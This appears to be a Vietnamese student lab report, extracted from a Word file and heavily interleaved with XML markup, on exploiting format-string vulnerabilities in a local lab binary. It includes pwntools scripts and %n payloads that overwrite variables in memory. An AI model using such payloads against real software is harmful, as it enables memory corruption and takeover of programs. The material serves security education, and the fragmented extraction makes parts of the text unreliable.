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Nhóm 9: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Nguyễn Bùi Kim Ngân - 20520648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Nguyễn Bình Thục Trâm - 20520815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Võ Anh Kiệt - 20520615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B1. Tìm hiểu về chuỗi định dạng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Yêu cầu 1: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Yêu cầu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Chuỗi định dạng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 In ra 1 số nguyên hệ thập phân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%d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 In ra 1 số nguyên 4 byte hệ thập lục phân, trong đó luôn in đủ 8 số hexan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0x%08x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3. In ra số nguyên dương, có ký hiệu + phía trước và chiếm ít nhất 5 ký tự, nếu không đủ thì thêm ký tự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%+05i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4. In tối đa chuỗi 8 ký tự, nếu dư sẽ cắt bớt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%.8s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5. In ra 1 số thực, trong đó đầu ra sẽ chiếm ít nhất 7 ký tự và hiển thị tối thiểu 3 chữ số thập phân. Nếu số chữ số không đủ, nó sẽ đệm khoảng trắng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%7.3f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6. In ra 1 số thực, trong đó đầu ra sẽ chiếm ít nhất 7 và hiển thị tối thiểu 3 chữ số thập phân. Nếu số chữ số không đủ, nó sẽ đệm ký tự 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%07.3f</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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B.2 Khai thác lỗ hổng format string để đọc dữ liệu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Giả sử nhập s là 1 chuỗi có dạng “%08x.%08x.%08x”. Giải thích ý nghĩa của chuỗi định dạng trên?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 3 tham số số nguyên có tối thiểu 8 ký tự, nếu không đủ sẽ thêm ký tự 0 và cách nhau dấu .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B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Yêu cầu 2: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57912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9652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1054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863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Yêu cầu 2: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color w:val="ff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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Như vậy, để đọc được đến dữ liệu tại khung màu xanh, cần bao nhiêu ký hiệu %x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Cần 29 ký tự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175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color w:val="ff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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So sánh giá trị k và m ở 2 cách này?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Giá trị m = 29 =k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10541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Yêu cầu 3: Giải thích vì sao %s%s%s gây lỗi chương trình?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810250" cy="25812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Chuỗi định dạng trên sẽ in ra 3 string lấy lần lượt từ địa chỉ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0xffffcdd4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nhưng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địa chỉ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0xffffcddc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lưu giá trị số nguyên là 0x1 nên bị lỗi xung đột dữ liệu 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Yêu cầu 4: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color w:val="ff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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Giả sử đặt địa chỉ cần đọc dữ liệu ở đầu chuỗi s (khung màu xanh), xác định địa chỉ cần đọc dữ liệu lưu trong chuỗi s sẽ nằm ở tham số thứ mấy của printf?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Địa chỉ cần đọc nằm ở tham số thứ 5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Dat breakpoint o scanf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color w:val="ff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Dat breakpoint o print thu 2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color w:val="ff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20828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Sinh viên giải thích ý nghĩa dòng code 16 để lấy địa chỉ của scanf từ GOT?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 ra chuỗi ở dạng hex (được mã hóa từ unsigned 32 bit integer sang hex) với chuỗi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color w:val="6d9eeb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d9eeb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 5: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color w:val="ff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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Vị trí lưu chuỗi định dạng s sẽ tương ứng với tham số thứ mấy của printf?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Ứng với tham số thứ nhất</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047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321262" cy="2727863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96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1262" cy="2727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Địa chỉ biến c: 0xffffd52c</w:t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829175" cy="2662238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Địa chỉ lưu chuỗi s: 0xffffd4c8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004C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441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Vị trí bắt đầu các tham số của hàm printf thứ 2: 0xffffd4b0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Tại 0xffffd4c8, tức tham số thứ 7 của hàm printf lưu giá trị chuỗi s đã nhập “hello” vậy nên em đoán rằng đây sẽ là nơi lưu địa chỉ biến c để ghi đè vào =&gt; k = 7-1=6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000050">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:shd w:fill="d9d2e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Chuỗi định dạng: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4cccc" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> [addr of c]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d9ead3" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%012d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d9d2e9" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%6$n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051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Với addr of c có 4 bytes + thêm 12 bytes padding đủ 16 là giá trị yêu cầu để ghi đè vào vùng nhớ biến c.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052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Code python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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pwn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05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5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process(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'./app-overwrite'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get address of c from the first output</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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c_addr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.recvuntil(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'- Address of c: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hex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c_addr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additional format – change to your format to create 12 characters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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additional_format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%012d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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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overwrite offset – change to your format</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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overwrite_offset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'%6$n'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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p32(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c_addr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additional_format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overwrite_offset</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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'- Your payload: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.sendline(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.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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2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Kết quả chạy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064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19812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  <w:b w:val="1"/>
          <w:color w:val="6d9eeb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d9eeb"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu cầu 6:</w:t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Chuỗi định dạng: ab%k$nxx[addr a]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ab để ghi giá trị 2 và chiếm 2 bytes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%k$n chiếm 4 bytes do đó cần padding thêm 2 bytes xx thành 8 bytes để đẩy addr của a về vị trí thích hợp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Lúc này vị trí tham số của printf tăng lên 2 do đó k = 6 + 2 = 8.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006B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Code python:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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pwn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</w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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6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process(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'./app-overwrite'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a_addr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0804a024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address of a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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format string – change to your answer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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'ab%8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$nxx'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p32(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a_addr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.sendline(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.recv())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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.interactive()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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6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Kết quả chạy:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000078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1130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Yêu cầu 7:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007C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15748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Địa chỉ biến b là: 0x0804a028</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007E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Giả sử gọi địa chỉ của b là b_addr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F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Do giá trị cần đè rất lớn nên ýtưởng của bài này là ta sẽ ghi đè lên b_addr và những vùng nhớ tiếp theo của nó thành những giá trị mong muốn:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000080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b_addr </w:t>
        <w:tab/>
        <w:t xml:space="preserve">= 0x78</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000081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b_addr + 1</w:t>
        <w:tab/>
        <w:t xml:space="preserve">= 0x56</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000082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b_addr + 2 </w:t>
        <w:tab/>
        <w:t xml:space="preserve">= 0x34</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000083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b_addr + 3</w:t>
        <w:tab/>
        <w:t xml:space="preserve">= 0x12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000084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Overwrite b_addr bằng 0x78:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000086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 có 0x78 ở dec là 120 và vị trí của payload trên stack sẽ là đối số thứ 6 trong format string. Nhưng do thêm vào đầu payload thì payload sẽ có thêm 4 byte được đọc trước %n nên ta sẽ giảm offset xuống 4 là 116</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000087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Vậy ta sẽ có code và kết quả ở terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000088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Overwrite b_addr + 1 bằng 0x56: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 chèn thêm b_addr + 1 nên b_addr sẽ giảm xuống 4 từ 116 còn 112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Để tính offset ta sẽ thử %10x%7$n do %6$n sẽ ghi vào đối số thứ 6 của b_addr nhưng b_addr + 1 nằm cách đầu payload 4 byte nên b_addr + 1 sẽ trở thành đối số thứ 7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 sẽ thấy kết quả trả về là 0x82 với %10x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Tiếp tục thử với %20x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Kết quả trả về là 0x8c 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So với kết quả 1 là 0x8C - 0x82 = 0xA = 10 byte, tương ứng với lượng offset mà ta vừa thay đổi 10 lên 20.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Vì giá trị mà ta mong muốn thực hiện đè là 0x56 mà hiện tại là ta mong muốn việc thay đổi giá trị hiện tại là 0x82 ở b_addr + 1. Ngoài ra, không thể giảm số byte đã đọc nên ta chỉ có thể tăng số byte đọc lên 0x156 byte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Vậy ta sẽ thực hiện phép tính 0x156 - 0x82 + 0xA = 0xDE = 222 byte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Vậy ta sẽ có code và kết quả ở terminal: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Overwrite b_addr + 2 bằng 0x34 và b_addr + 3 bằng 0x12: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Thực hiện tuần tự như bên trên, giảm offset của 1 đi 4 mỗi lần thì sẽ còn lại 104, ở các payload tiếp theo sử dụng 222 như ở trường hợp b_addr + 1 và mỗi lần thêm vào ta cần phải thêm vào đối số 8 và đối số 9 ở b_addr + 2 và b_addr + 3. Vậy ta sẽ có được phần payload như sau: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 p32(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+ p32(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+ p32(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+ p32(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 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%104x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%6$n'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%222x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%7$n'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%222x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%8$n'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%222x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%9$n'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Vậy ta sẽ có code và kết quả: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Phần code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pwn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'./app-overwrite'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'./app-overwrite'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symbols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p32(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+ p32(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+ p32(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+ p32(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b_addr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 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%104x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%6$n'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%222x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%7$n'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%222x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%8$n'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b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%222x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%9$n'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"This is the payload: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"End of payload"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interactive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Kết quả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4.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17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5.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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0.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png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22.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7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